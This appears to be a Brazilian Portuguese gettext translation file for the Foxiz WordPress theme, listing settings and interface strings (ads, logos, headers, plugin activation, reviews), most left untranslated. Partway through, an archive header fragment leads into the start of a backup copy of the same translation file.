msgid "" "This option use for \"Time Delay\" mode. Input a delay time (ms) value to " "show the popup after the site loaded." msgstr "" #: backend/panels/design.php:329 msgid "" "This option will help you optimize the site speed or increase image quality " "on your website." msgstr "" #: backend/class-tgm-plugin-activation.php:615 msgid "This plugin needs to be updated to be compatible with your theme." msgstr "" #: backend/panels/ads.php:86 msgid "" "This section supports ads in the top header website. For other ad spots, " "please read the theme documentation for further info." msgstr "" #: backend/panels/ads.php:274 msgid "" "This section supports ads inside single post content, after x paragraphs. " "For other ad spots, please read the theme documentation for further info." msgstr "" #: backend/panels/header.php:639 msgid "" "This section will show a small alert or event at the bottom of the " "navigation." msgstr "" #: backend/panels/header.php:264 msgid "This section will show the user bookmark list and latest blog listing." msgstr "" #: backend/panels/header.php:620 msgid "This setting apply to the logout button in the logged user dropdown." msgstr "" #: backend/panels/header.php:61 msgid "" "This setting requires to set \"Use Ruby Template\" in the setting above in " "order to work." msgstr "" #: backend/panels/color.php:125 backend/panels/color.php:142 msgid "This setting will apply to the default mode." msgstr "" #: backend/panels/blog-pages.php:155 msgid "" "This setting will be overridden by \"Global WP Query Template Shortcode\" in " "the individual category setting panel." msgstr "" #: backend/panels/blog-pages.php:121 msgid "" "This setting will be overridden by \"template shortcode\" in the individual " "category setting panel." msgstr "" #: backend/panels/table-contents.php:150 msgid "This setting will not apply to the full width 2 columns layout." msgstr "" #: backend/panels/single-post.php:499 msgid "" "This setting will only apply on the desktop devices. Navigate to " "\"Typography > Entry Category\" to set for tablet mobile devices." msgstr "" #: backend/panels/blog-pages.php:179 backend/panels/blog-pages.php:715 #: backend/panels/blog-pages.php:1130 msgid "" "This setting will override on \"Dashboard > Settings > Reading > Blog pages " "show at most\" setting. It also apply to the \"Global WP Query Template " "Shortcode\"." msgstr "" #: backend/mega-menu.php:198 msgid "This setting will override on above settings." msgstr "" #: backend/panels/blog-pages.php:62 backend/panels/blog-pages.php:628 #: backend/panels/blog-pages.php:1946 msgid "" "This setting will override on the \"Header Style\" setting, Leave it blank " "if you would like to use the \"Header Style\" setting." msgstr "" #: backend/panels/blog-pages.php:47 backend/panels/blog-pages.php:613 #: backend/panels/blog-pages.php:1931 msgid "" "This setting will override on the setting in the header panel. It will not " "apply to the header style 4." msgstr "" #: backend/class-tgm-plugin-activation.php:354 #, php-format msgid "This theme recommends the following plugin: %1$s." msgstr "" #: backend/class-tgm-plugin-activation.php:348 #, php-format msgid "This theme requires the following plugin: %1$s." msgstr "" #: backend/panels/newsletter.php:97 msgid "Time Delay" msgstr "" #: backend/panels/adblock.php:26 backend/panels/newsletter.php:34 msgid "Title" msgstr "" #: backend/category-settings.php:433 backend/panels/block-classic.php:120 #: backend/panels/block-grid.php:120 backend/panels/block-grid.php:285 #: backend/panels/block-grid.php:450 backend/panels/block-grid.php:623 #: backend/panels/block-grid.php:810 backend/panels/block-list.php:128 #: backend/panels/block-list.php:301 backend/panels/block-list.php:482 #: backend/panels/block-list.php:677 backend/panels/blog-pages.php:460 #: backend/panels/blog-pages.php:947 backend/panels/blog-pages.php:1361 #: backend/panels/blog-pages.php:1769 backend/panels/blog-pages.php:2261 #: backend/panels/bookmark.php:359 backend/panels/bookmark.php:807 msgid "Title HTML Tag" msgstr "" #: backend/class-tgm-plugin-activation.php:2494 #, php-format msgid "To Activate (%s)" msgstr "" #: backend/panels/header.php:121 msgid "" "To add column widgets, navigate to \"Dashboard > Appearance > Widgets > More " "Menu Section\". Please read the documentation for further information." msgstr "" #: backend/panels/footer.php:92 msgid "To add content, please navigate to Appearance > Widgets." msgstr "" #: backend/panels/logo.php:39 msgid "" "To add the favicon, navigate to \"Appearance > Customize > Site Identity > " "Site Icon\". Please read the documentation for further information." msgstr "" #: backend/panels/design.php:40 msgid "" "To edit color for individual category, navigate to \"Admin Dashboard > Posts " "> Categories > Edit\"." msgstr "" #: backend/panels/blog-pages.php:25 msgid "" "To edit for individual category, navigate to \"Admin Dashboard > Posts > " "Categories > Edit\"." msgstr "" #: backend/panels/single-post.php:1550 msgid "" "To edit for individual post, navigate to \"Posts > Edit > Post Options > " "Site Header\"." msgstr "" #: backend/panels/heading.php:29 msgid "" "To edit the heading typography, navigate to \"Typography > Block Heading\"." msgstr "" #: backend/panels/header.php:182 msgid "" "To edit the placeholder text of the search form, navigate to \"Theme Options " "> General > Search Placeholder\"." msgstr "" #: backend/panels/single-post.php:524 msgid "" "To edit the tagline typography, navigate to \"Typography > Headline & " "Tagline > Single Tagline\"." msgstr "" #: backend/panels/header.php:315 msgid "" "To edit the typography, navigate to \"Typography > Menu > Mobile Menu " "Settings\". Navigate to \"Social Profiles\" for the social list." msgstr "" #: backend/panels/sidebar.php:21 msgid "" "To edit the widget heading layout, navigate to \"Heading Design > Sidebar " "Widget Heading\"." msgstr "" #: backend/class-tgm-plugin-activation.php:2486 #, php-format msgid "To Install (%s)" msgstr "" #: backend/panels/amp.php:132 msgid "" "To setup the copyright area, Please navigate to Footer > Copyright Section." msgstr "" #: backend/panels/single-post.php:1260 msgid "" "To use the shortcode, read the documentation \"Related Box Shortcode\" for " "further information." msgstr "" #: backend/panels/header.php:203 msgid "Toggle Mode" msgstr "" #: backend/panels/general.php:17 msgid "Tooltips" msgstr "" #: backend/configs.php:376 msgid "Top" msgstr "" #: backend/panels/blog-pages.php:643 msgid "Top & Bottom Area Template Builder" msgstr "" #: backend/panels/header-style.php:618 msgid "Top & Bottom Border" msgstr "" #: backend/configs.php:377 msgid "Top (Big Icon)" msgstr "" #: backend/panels/amp.php:420 msgid "Top - Ad Type" msgstr "" #: backend/panels/amp.php:448 msgid "Top - Adsense Size" msgstr "" #: backend/panels/amp.php:460 msgid "Top - AMP Custom Ad Script" msgstr "" #: backend/panels/amp.php:432 msgid "Top - Data Ad Client" msgstr "" #: backend/panels/amp.php:440 msgid "Top - Data Ad Slot" msgstr "" #: backend/category-settings.php:129 backend/panels/blog-pages.php:649 msgid "Top Area Template Shortcode" msgstr "" #: backend/panels/footer.php:53 msgid "Top Border" msgstr "" #: backend/single-metaboxes.php:681 msgid "Top Entry Widgets Area" msgstr "" #: includes/menu.php:302 msgid "Top News" msgstr "" #: backend/panels/single-post.php:706 msgid "Top Share Bar" msgstr "" #: backend/panels/amp.php:414 msgid "Top Single Content Ad Settings" msgstr "" #: backend/panels/ads.php:77 backend/panels/privacy.php:25 msgid "Top Site" msgstr "" #: backend/single-metaboxes.php:142 backend/single-metaboxes.php:919 msgid "Top Site Advert" msgstr "" #: backend/category-settings.php:124 backend/panels/blog-pages.php:114 msgid "Top Template Builder" msgstr "" #: backend/panels/woocommerce.php:147 msgid "Total Related Products" msgstr "" #: backend/configs.php:80 msgid "Transparent - Style 1" msgstr "" #: backend/configs.php:81 msgid "Transparent - Style 2" msgstr "" #: backend/configs.php:82 msgid "Transparent - Style 3" msgstr "" #: backend/panels/header-style.php:262 msgid "Transparent Colors" msgstr "" #: backend/panels/logo.php:125 msgid "Transparent Logo" msgstr "" #: backend/panels/logo.php:115 msgid "Transparent Logos" msgstr "" #: backend/panels/logo.php:133 msgid "Transparent Retina Logo" msgstr "" #: backend/panels/header.php:547 msgid "Trigger Button Layout" msgstr "" #: backend/panels/single-post.php:768 backend/panels/single-post.php:907 #: backend/panels/single-post.php:1045 backend/panels/single-post.php:1673 #: templates/parts.php:609 msgid "Tumblr" msgstr "" #: backend/panels/socials.php:68 msgid "Tumblr URL " msgstr "" #: backend/panels/single-post.php:732 backend/panels/single-post.php:871 #: backend/panels/single-post.php:1009 backend/panels/single-post.php:1641 #: templates/parts.php:594 msgid "Twitter" msgstr "" #: backend/panels/socials.php:35 msgid "Twitter URL" msgstr "" #: backend/class-tgm-plugin-activation.php:2643 msgid "Type" msgstr "" #: backend/panels/typography.php:13 msgid "Typography" msgstr "" #: backend/panels/single-post.php:245 msgid "Underline Color" msgstr "" #: bookmark/bookmark.php:57 msgid "Undo" msgstr "" #: templates/parts.php:803 msgid "Unfollow" msgstr "" #: backend/class-tgm-plugin-activation.php:2576 msgid "unknown" msgstr "" #: backend/panels/sidebar.php:37 msgid "Unlimited Sidebars" msgstr "" #: backend/class-tgm-plugin-activation.php:2817 msgid "Update" msgstr "" #: backend/configs.php:408 backend/panels/design.php:274 msgid "update (Last Updated)" msgstr "atualização (última atualização)" #: backend/class-tgm-plugin-activation.php:2702 #, php-format msgid "Update %2$s" msgstr "" #: backend/class-tgm-plugin-activation.php:2490 #, php-format msgid "Update Available (%s)" msgstr "" #: backend/class-tgm-plugin-activation.php:2427 msgid "Update recommended" msgstr "" #: backend/class-tgm-plugin-activation.php:616 msgid "Update Required" msgstr "" #: templates/single/templates.php:456 msgid "Updated" msgstr "Atualizado" #: backend/panels/design.php:117 msgid "Updated Date Icon" msgstr "" #: backend/class-tgm-plugin-activation.php:3592 #, php-format msgid "Updating Plugin %1$s (%2$d/%3$d)" msgstr "" #: backend/class-tgm-plugin-activation.php:344 #, php-format msgid "Updating Plugin: %s" msgstr "" #: backend/class-tgm-plugin-activation.php:2778 msgid "Upgrade message from the plugin author:" msgstr "" #: backend/single-metaboxes.php:535 msgid "Upload a background header image for this review section." msgstr "" #: backend/panels/blog-pages.php:1983 msgid "Upload a background image for the search header in the dark mode." msgstr "" #: backend/panels/blog-pages.php:1969 msgid "Upload a background image for the search header." msgstr "" #: backend/panels/blog-pages.php:2399 msgid "Upload a header image for the 404 page in the dark mode." msgstr "" #: backend/panels/blog-pages.php:2391 msgid "Upload a header image for the 404 page." msgstr "" #: backend/panels/bookmark.php:129 backend/panels/bookmark.php:472 msgid "Upload a image for displaying at the top heading in the dark mode." msgstr "" #: backend/panels/bookmark.php:121 backend/panels/bookmark.php:464 msgid "Upload a image for displaying at the top heading. Image height is 60px." msgstr "" #: backend/panels/logo.php:126 msgid "" "Upload a light logo for transparent headers. Recommended logo height value " "is 60px, allowed extensions are .jpg, .png and .gif." msgstr "" #: backend/panels/logo.php:104 msgid "" "Upload a light retina logo for displaying in mobile device. It should be " "same dimensions with the mobile logo." msgstr "" #: backend/panels/logo.php:134 msgid "" "Upload a light retina logo for transparent headers. Recommended logo height " "value is 120px." msgstr "" #: backend/panels/logo.php:96 msgid "" "Upload a logo for the mobile device. Recommended logo height value is 84px, " "allowed extensions are .jpg, .png and .gif" msgstr "" #: backend/panels/footer.php:153 msgid "" "Upload a small dark logo to display at bottom of the footer in the dark mode." msgstr "" #: backend/panels/footer.php:145 msgid "Upload a small logo to display at bottom of the footer." msgstr "" #: backend/panels/amp.php:92 msgid "Upload AMP footer logo." msgstr "" #: backend/category-settings.php:87 msgid "Upload featured images (maximum: 2 images) for this category." msgstr "" #: backend/single-metaboxes.php:433 msgid "Upload Gallery" msgstr "" #: backend/panels/logo.php:160 msgid "" "Upload icon for the Apple touch (72 x 72px), allowed extensions are .jpg, ." "png, .gif" msgstr "" #: backend/panels/logo.php:168 msgid "" "Upload icon for the Metro interface (144 x 144px), allowed extensions are ." "jpg, .png, .gif" msgstr "" #: backend/single-metaboxes.php:643 msgid "" "Upload the sponsor light logo for this post, recommended height for the logo " "is 52px." msgstr "" #: backend/single-metaboxes.php:637 msgid "" "Upload the sponsor logo for this post, recommended height for the logo is " "52px." msgstr "" #: backend/panels/ads.php:187 backend/panels/ads.php:376 msgid "Upload your ad image in the dark mode." msgstr "" #: backend/panels/ads.php:180 backend/panels/ads.php:369 msgid "Upload your ad image." msgstr "" #: backend/single-metaboxes.php:399 msgid "Upload your audio file, support: mp3, ogg, wma, m4a, wav files." msgstr "" #: backend/panels/login.php:67 msgid "Upload your background for the logo screen." msgstr "" #: backend/single-metaboxes.php:434 msgid "Upload your images for this gallery." msgstr "" #: backend/panels/login.php:52 msgid "" "Upload your logo for the logo screen. This option will override on wordpress " "logo." msgstr "" #: backend/single-metaboxes.php:339 msgid "" "Upload your preview video. Keep video short and lightweight as possible to " "save server bandwidth." msgstr "" #: backend/single-metaboxes.php:351 msgid "Upload your video file, support: mp4, m4v, webm, ogv, wmv, flv files." msgstr "" #: backend/panels/ads.php:124 backend/panels/ads.php:313 msgid "Use Adsense units code to ensure it display exactly where you put." msgstr "" #: backend/configs.php:359 msgid "Use Custom" msgstr "" #: backend/category-settings.php:105 backend/panels/blog-pages.php:1225 #: backend/panels/breadcrumb.php:54 backend/panels/breadcrumb.php:65 #: backend/panels/breadcrumb.php:76 backend/panels/breadcrumb.php:87 #: backend/panels/breadcrumb.php:98 backend/panels/page.php:85 #: backend/panels/single-post.php:452 msgid "Use Global Setting" msgstr "" #: backend/configs.php:223 msgid "Use Post Excerpt" msgstr "" #: backend/configs.php:86 backend/panels/footer.php:98 msgid "Use Ruby Template" msgstr "" #: backend/panels/header-style.php:114 backend/panels/header-style.php:402 #: backend/panels/header-style.php:439 backend/panels/header-style.php:669 #: backend/panels/header.php:410 msgid "use the option \"To\" to set a gradient background." msgstr "" #: backend/configs.php:224 msgid "Use Title Tagline" msgstr "" #: backend/panels/sidebar.php:49 msgid "" "Useful when a sidebar is too tall or too short compared to the rest of the " "content." msgstr "" #: backend/panels/header.php:609 msgid "User Dashboard Menu" msgstr "" #: backend/panels/bookmark.php:438 msgid "User Interests" msgstr "" #: backend/panels/single-post.php:1175 backend/panels/single-post.php:1219 #: backend/single-metaboxes.php:483 msgid "User Rating in Comments" msgstr "" #: backend/panels/reaction.php:16 backend/single-metaboxes.php:839 msgid "User Reaction" msgstr "" #: templates/single/reviews.php:242 msgid "User Votes" msgstr "" #: backend/class-tgm-plugin-activation.php:2647 msgid "Version" msgstr "" #: backend/configs.php:849 msgid "Vertical Banner (120 x 240)" msgstr "" #: templates/single/review-comment.php:94 msgid "Very Poor" msgstr "" #: backend/panels/single-post.php:312 msgid "Via Bar" msgstr "" #: backend/single-metaboxes.php:799 msgid "Via Name" msgstr "" #: backend/single-metaboxes.php:804 msgid "Via URL" msgstr "" #: templates/single/templates.php:701 msgid "VIA:" msgstr "Via:" #: backend/single-metaboxes.php:316 msgid "Video Format" msgstr "" #: backend/panels/design.php:477 msgid "Video Icon" msgstr "" #: backend/panels/design.php:498 msgid "Video Icon Color" msgstr "" #: backend/single-metaboxes.php:322 msgid "Video Layout" msgstr "" #: backend/panels/single-post.php:60 msgid "Video Post Format Layout" msgstr "" #: backend/panels/single-post.php:66 msgid "Video Post Layout" msgstr "" #: backend/single-metaboxes.php:331 msgid "Video URL" msgstr "" #: backend/configs.php:406 backend/panels/design.php:272 msgid "view (Post Views)" msgstr "" #: templates/header/templates.php:905 msgid "View Cart" msgstr "" #: templates/parts.php:636 msgid "Vimeo" msgstr "" #: backend/panels/socials.php:122 msgid "Vimeo URL " msgstr "" #: backend/panels/single-post.php:786 backend/panels/single-post.php:925 #: backend/panels/single-post.php:1063 backend/panels/single-post.php:1689 #: templates/parts.php:642 msgid "Vkontakte" msgstr "" #: backend/panels/socials.php:134 msgid "VKontakte URL " msgstr "" #: templates/single/reviews.php:245 msgid "vote" msgstr "" #: templates/single/reviews.php:247 msgid "votes" msgstr "" #: backend/panels/general.php:56 msgid "" "We recommend you should create a backup before updating or major changes." msgstr "" #: backend/panels/optimized.php:21 #, php-format msgid "" "We recommend you to refer this " "DOCUMENTATION to optimize for you website" msgstr "" #: templates/parts.php:588 msgid "Website" msgstr "" #: backend/panels/typography.php:27 msgid "Website Body" msgstr "" #: backend/panels/header.php:560 msgid "Welcome Back!" msgstr "" #: templates/single/templates.php:753 msgid "What do you think?" msgstr "O que você acha?" #: backend/panels/single-post.php:1348 msgid "What posts should be displayed in the related section." msgstr "" #: backend/panels/single-post.php:750 backend/panels/single-post.php:889 #: backend/panels/single-post.php:1027 backend/panels/single-post.php:1657 #: templates/parts.php:648 msgid "WhatsApp" msgstr "" #: backend/panels/socials.php:146 msgid "Whatsapp URL " msgstr "" #: backend/category-settings.php:418 backend/panels/block-classic.php:99 #: backend/panels/block-grid.php:99 backend/panels/block-grid.php:264 #: backend/panels/block-grid.php:429 backend/panels/block-grid.php:602 #: backend/panels/block-grid.php:789 backend/panels/block-list.php:107 #: backend/panels/block-list.php:280 backend/panels/block-list.php:461 #: backend/panels/block-list.php:656 backend/panels/blog-pages.php:444 #: backend/panels/blog-pages.php:931 backend/panels/blog-pages.php:1345 #: backend/panels/blog-pages.php:1753 backend/panels/blog-pages.php:2245 #: backend/panels/bookmark.php:343 backend/panels/bookmark.php:791 msgid "" "When you select \"use title tagline\". if it is empty, it will fallback to " "the post excerpt or content." msgstr "" #: backend/category-settings.php:417 backend/panels/block-classic.php:98 #: backend/panels/block-grid.php:98 backend/panels/block-grid.php:263 #: backend/panels/block-grid.php:428 backend/panels/block-grid.php:601 #: backend/panels/block-grid.php:788 backend/panels/block-list.php:106 #: backend/panels/block-list.php:279 backend/panels/block-list.php:460 #: backend/panels/block-list.php:655 backend/panels/blog-pages.php:443 #: backend/panels/blog-pages.php:930 backend/panels/blog-pages.php:1344 #: backend/panels/blog-pages.php:1752 backend/panels/blog-pages.php:2244 #: backend/panels/bookmark.php:342 backend/panels/bookmark.php:790 msgid "Where to get the post excerpt." msgstr "" #: backend/configs.php:847 msgid "Wide Skyscraper (160x600)" msgstr "" #: backend/panels/sidebar.php:55 msgid "Widget Block Editor" msgstr "" #: backend/panels/heading.php:112 msgid "Widget Heading HTML Tag" msgstr "" #: backend/panels/heading.php:95 msgid "Widget Heading Layout" msgstr "" #: backend/panels/footer.php:113 msgid "Widget Menu Font Size" msgstr "" #: backend/panels/single-post.php:165 msgid "Width Settings" msgstr "" #: backend/panels/reaction.php:48 msgid "Wink" msgstr "" #: backend/panels/woocommerce.php:28 msgid "WooCommerce" msgstr "" #: backend/panels/woocommerce.php:44 msgid "WooCommerce Pages" msgstr "" #: backend/panels/woocommerce.php:15 msgid "" "Woocommerce plugin not found! Please install and active Woocommerce to active settings " "below." msgstr "" #: backend/class-tgm-plugin-activation.php:2386 msgid "WordPress Repository" msgstr "" #: backend/panels/design.php:354 msgid "" "WordPress will crop uploaded images to ensure your website use the best " "image size for the blog layouts." msgstr "" #: backend/panels/design.php:165 msgid "Words per Minute" msgstr "" #: backend/panels/header-style.php:60 backend/panels/header-style.php:354 #: backend/panels/header-style.php:606 msgid "Wrapper (1240px)" msgstr "" #: backend/panels/optimized.php:91 msgid "Write CSS to file to reduce CPU usage and reduce the load time." msgstr "" #: backend/panels/heading.php:23 msgid "" "You can also choose layouts and colors for individual heading the page " "builder." msgstr "" #: backend/panels/typography.php:84 msgid "" "You can control the excerpt font sizes in this panel. The font family and " "other font values will base on \"Body Font\" values." msgstr "" #: backend/panels/dark-mode.php:24 msgid "" "You can set custom dark mode background in \"Global Colors > Dark Mode " "Background\"." msgstr "" #: bookmark/templates.php:60 msgid "You haven't saved anything yet." msgstr "" #: templates/single/footer.php:50 msgid "You Might Also Like" msgstr "Você pode gostar também" #: backend/panels/bookmark.php:113 msgid "you'll find all saved articles here." msgstr "" #: templates/ajax.php:128 msgid "You've reached the end of the list!" msgstr "" #: backend/panels/bookmark.php:449 msgid "Your Categories" msgstr "" #: templates/single/review-comment.php:97 msgid "Your comment" msgstr "" #: templates/single/review-comment.php:63 msgid "Your Email" msgstr "Seu email" #: includes/actions.php:47 msgid "Your email" msgstr "Seu email" #: includes/actions.php:44 templates/single/review-comment.php:57 msgid "Your name" msgstr "Seu nome" #: templates/single/review-comment.php:87 msgid "Your Rating" msgstr "" #: templates/single/templates.php:942 msgid "Your review is awaiting moderation." msgstr "" #: templates/single/templates.php:944 msgid "" "Your review is awaiting moderation. This is a preview, your review will be " "visible after it has been approved." msgstr "" #: includes/actions.php:51 msgid "Your Website" msgstr "Seu site" #: templates/single/review-comment.php:69 msgid "Your website" msgstr "Seu site" #: templates/parts.php:597 msgid "YouTube" msgstr "" #: backend/panels/socials.php:42 msgid "Youtube URL " msgstr "" #: backend/panels/newsletter.php:57 msgid "Zero spam, Unsubscribe at any time." msgstr "" PK![NolYlY*languages/pt_BR-backup-202209012312410.po~nu[msgid "" msgstr "" "Project-Id-Version: Foxiz\n" "POT-Creation-Date: 2022-05-18 13:30+0700\n" "PO-Revision-Date: 2022-09-01 23:06+0000\n" "Last-Translator: \n" "Language-Team: Português do Brasil\n" "Language: pt_BR\n" "MIME-Version: 1.0\n" "Content-Type: text/plain; charset=UTF-8\n" "Content-Transfer-Encoding: 8bit\n" "X-Generator: Loco https://localise.biz/\n" "X-Poedit-Basepath: ..\n" "Plural-Forms: nplurals=2; plural=n != 1;\n" "X-Poedit-SourceCharset: UTF-8\n" "X-Poedit-KeywordsList: _x;__;_e;_nx:1,2;esc_html__;esc_html_e;esc_attr__;" "esc_attr_e;foxiz_html__;foxiz_attr__;foxiz_html_e;foxiz_attr_e;_n;_nx;" "_n_noop\n" "X-Poedit-SearchPath-0: .\n" "X-Poedit-SearchPathExcluded-0: *.js\n" "Report-Msgid-Bugs-To: \n" "X-Loco-Version: 2.6.2; wp-6.0.2" #: templates/blog.php:498 msgid " Get started here" msgstr "" #: backend/panels/page.php:30 msgid " Page Header Style" msgstr "" #: backend/panels/footer.php:83 msgid "" "\"Column Border\" and \"Widget Menu Font Size\" and \"Text Color Scheme\" " "will not apply to Ruby template shortcode." msgstr "" #: backend/panels/design.php:103 backend/panels/single-post.php:592 msgid "\"Posted\" Author Label" msgstr "" #: backend/class-tgm-plugin-activation.php:3603 #, php-format msgid "%1$s installed and activated successfully." msgstr "" #: backend/class-tgm-plugin-activation.php:3611 #, php-format msgid "%1$s installed successfully." msgstr "" #: backend/class-tgm-plugin-activation.php:2436 #, php-format msgid "%1$s, %2$s" msgstr "" #: templates/entry.php:320 #, php-format msgid "%s ago" msgstr "" #: templates/single/templates.php:910 #, php-format msgid "%s Comments" msgstr "%s Comentários" #: templates/entry.php:557 #, php-format msgid "%s comments" msgstr "%s comentários" #: templates/entry.php:692 #, php-format msgid "%s Min Read" msgstr "" #: templates/single/reviews.php:54 #, php-format msgid "%s out of 10" msgstr "" #: templates/single/reviews.php:97 #, php-format msgid "%s out of 5" msgstr "" #: templates/single/templates.php:886 #, php-format msgid "%s Reviews" msgstr "" #: templates/entry.php:619 #, php-format msgid "%s Views" msgstr "" #: comments.php:25 msgid "← Older Comments" msgstr "" #: backend/single-metaboxes.php:753 msgid "+Add Heading" msgstr "" #: backend/single-metaboxes.php:208 msgid "+Add Highlight" msgstr "" #: backend/single-metaboxes.php:775 msgid "+Add Post Source" msgstr "" #: backend/single-metaboxes.php:796 msgid "+Add Post Via" msgstr "" #: backend/panels/ads.php:412 msgid "- Advertisement -" msgstr "" #: backend/panels/header.php:612 msgid "- Assign a Menu -" msgstr "" #: backend/category-settings.php:104 backend/category-settings.php:116 #: backend/category-settings.php:142 backend/category-settings.php:242 #: backend/category-settings.php:315 backend/category-settings.php:349 #: backend/category-settings.php:401 backend/configs.php:46 #: backend/configs.php:71 backend/configs.php:106 backend/configs.php:161 #: backend/configs.php:195 backend/configs.php:209 backend/configs.php:236 #: backend/configs.php:288 backend/configs.php:319 backend/configs.php:357 #: backend/configs.php:373 backend/configs.php:424 backend/configs.php:499 #: backend/configs.php:524 backend/configs.php:542 backend/configs.php:559 #: backend/configs.php:583 backend/configs.php:607 backend/configs.php:634 #: backend/configs.php:693 backend/configs.php:732 backend/configs.php:771 #: backend/configs.php:801 backend/configs.php:822 backend/mega-menu.php:139 #: backend/mega-menu.php:150 backend/panels/blog-pages.php:324 #: backend/panels/blog-pages.php:493 backend/panels/blog-pages.php:523 #: backend/panels/blog-pages.php:811 backend/panels/blog-pages.php:980 #: backend/panels/blog-pages.php:1010 backend/panels/blog-pages.php:1394 #: backend/panels/blog-pages.php:1424 backend/panels/blog-pages.php:1633 #: backend/panels/blog-pages.php:1802 backend/panels/blog-pages.php:1832 #: backend/panels/blog-pages.php:2125 backend/panels/blog-pages.php:2294 #: backend/panels/blog-pages.php:2324 backend/panels/bookmark.php:227 #: backend/panels/bookmark.php:392 backend/panels/bookmark.php:414 #: backend/panels/bookmark.php:675 backend/panels/bookmark.php:840 #: backend/panels/bookmark.php:870 backend/panels/design.php:578 #: backend/panels/design.php:595 backend/single-metaboxes.php:60 #: backend/single-metaboxes.php:73 backend/single-metaboxes.php:132 #: backend/single-metaboxes.php:223 backend/single-metaboxes.php:360 #: backend/single-metaboxes.php:408 backend/single-metaboxes.php:487 #: backend/single-metaboxes.php:507 backend/single-metaboxes.php:652 #: backend/single-metaboxes.php:714 backend/single-metaboxes.php:726 #: backend/single-metaboxes.php:824 backend/single-metaboxes.php:843 #: backend/single-metaboxes.php:862 backend/single-metaboxes.php:874 #: backend/single-metaboxes.php:909 msgid "- Default -" msgstr "" #: backend/configs.php:253 backend/mega-menu.php:168 #: backend/panels/bookmark.php:573 backend/panels/login.php:29 msgid "- Disable -" msgstr "" #: backend/panels/login.php:40 msgid "- Left -" msgstr "" #: backend/mega-menu.php:184 msgid "- Select Columns -" msgstr "" #: backend/panels/amp.php:303 backend/panels/amp.php:363 #: backend/panels/amp.php:423 backend/panels/amp.php:484 #: backend/panels/amp.php:544 msgid "-- Adsense --" msgstr "" #: backend/single-metaboxes.php:476 backend/single-metaboxes.php:615 msgid "-- Disable --" msgstr "" #: backend/panels/amp.php:331 backend/panels/amp.php:391 #: backend/panels/amp.php:451 backend/panels/amp.php:512 #: backend/panels/amp.php:572 msgid "-- Responsive --" msgstr "" #: backend/mega-menu.php:128 msgid "-Disable-" msgstr "" #: backend/configs.php:500 backend/mega-menu.php:47 msgid "1 Column" msgstr "" #: templates/single/templates.php:912 msgid "1 Comment" msgstr "1 Comentário" #: templates/entry.php:555 msgid "1 comment" msgstr "1 comentário" #: backend/panels/ads.php:480 backend/panels/newsletter.php:80 msgid "1 Day" msgstr "" #: backend/panels/ads.php:486 backend/panels/newsletter.php:86 msgid "1 Month" msgstr "" #: templates/single/templates.php:888 msgid "1 Review" msgstr "" #: templates/entry.php:617 msgid "1 View" msgstr "" #: backend/panels/ads.php:483 backend/panels/newsletter.php:83 msgid "1 Week" msgstr "" #: backend/configs.php:526 msgid "10px" msgstr "" #: backend/configs.php:527 msgid "14px" msgstr "" #: backend/panels/ads.php:241 msgid "15px" msgstr "" #: backend/configs.php:501 backend/mega-menu.php:48 #: backend/panels/header.php:130 msgid "2 Columns" msgstr "" #: backend/panels/ads.php:481 backend/panels/newsletter.php:81 msgid "2 Days" msgstr "" #: backend/panels/ads.php:484 backend/panels/newsletter.php:84 msgid "2 Weeks" msgstr "" #: backend/configs.php:528 msgid "20px" msgstr "" #: backend/configs.php:502 backend/mega-menu.php:49 #: backend/panels/header.php:131 msgid "3 Columns" msgstr "" #: backend/panels/footer.php:97 msgid "3 Columns (1/2/1)" msgstr "" #: backend/panels/ads.php:482 backend/panels/newsletter.php:82 msgid "3 Days" msgstr "" #: backend/panels/ads.php:485 backend/panels/newsletter.php:85 msgid "3 Weeks" msgstr "" #: backend/configs.php:529 msgid "30px" msgstr "" #: backend/configs.php:503 backend/mega-menu.php:50 #: backend/panels/header.php:132 msgid "4 Columns" msgstr "" #: backend/panels/footer.php:94 msgid "4 Columns (3/2/2/3)" msgstr "" #: backend/panels/ads.php:432 msgid "4,9" msgstr "" #: backend/panels/blog-pages.php:2375 msgid "404 Page" msgstr "" #: backend/configs.php:530 msgid "40px" msgstr "" #: backend/configs.php:504 backend/mega-menu.php:51 #: backend/panels/header.php:133 msgid "5 Columns" msgstr "" #: backend/panels/footer.php:95 msgid "5 Columns (1/1/1/1/1)" msgstr "" #: backend/panels/footer.php:96 msgid "5 Columns (40/15/15/15/15)" msgstr "" #: backend/configs.php:531 msgid "50px" msgstr "" #: backend/configs.php:505 msgid "6 Columns" msgstr "" #: backend/configs.php:532 msgid "60px" msgstr "" #: backend/configs.php:506 msgid "7 Columns" msgstr "" #: backend/configs.php:533 msgid "70px" msgstr "" #: backend/panels/newsletter.php:50 msgid "[mc4wp_form]" msgstr "" #: backend/panels/ads.php:471 backend/panels/blog-pages.php:63 #: backend/panels/blog-pages.php:629 backend/panels/blog-pages.php:1947 #: backend/panels/footer.php:121 backend/panels/header.php:62 msgid "[Ruby_E_Template id=\"1\"]" msgstr "" #: backend/panels/footer.php:47 msgid "A dotted area for display at the left of the footer." msgstr "" #: includes/sidebars.php:58 msgid "A sidebar section of your site." msgstr "" #: templates/header/templates.php:758 msgid "Aa" msgstr "" #: backend/panels/heading.php:57 backend/panels/heading.php:142 msgid "Accent Heading Color" msgstr "" #: templates/popup.php:27 msgid "Accept" msgstr "Aceitar" #: backend/class-tgm-plugin-activation.php:2820 msgid "Activate" msgstr "" #: backend/class-tgm-plugin-activation.php:2708 #, php-format msgid "Activate %2$s" msgstr "" #: backend/class-tgm-plugin-activation.php:2415 msgid "Active" msgstr "" #: backend/panels/ads.php:416 msgid "Ad Align" msgstr "" #: backend/panels/ads.php:409 msgid "Ad Description" msgstr "" #: backend/panels/ads.php:92 backend/panels/ads.php:97 #: backend/panels/ads.php:280 backend/panels/ads.php:285 msgid "Ad Type" msgstr "" #: backend/panels/adblock.php:29 msgid "AdBlock Detected" msgstr "" #: backend/panels/adblock.php:13 backend/panels/adblock.php:19 msgid "AdBlock Detector" msgstr "" #: templates/entry.php:553 msgid "Add a Comment" msgstr "" #: backend/panels/design.php:328 msgid "Add a Crop Size" msgstr "" #: backend/panels/newsletter.php:63 msgid "Add a link for the footer text (optional)." msgstr "" #: backend/panels/single-post.php:1403 msgid "Add a ruby template shortcode you would like to in this section.." msgstr "" #: backend/panels/sidebar.php:38 msgid "Add a Sidebar ID" msgstr "" #: backend/single-metaboxes.php:515 msgid "Add Criteria" msgstr "" #: templates/modules/category.php:20 msgid "Add More" msgstr "" #: backend/panels/woocommerce.php:228 msgid "Add to Cart Color" msgstr "" #: backend/panels/header.php:581 msgid "Adding a custom logo for the login form in the dark mode." msgstr "" #: 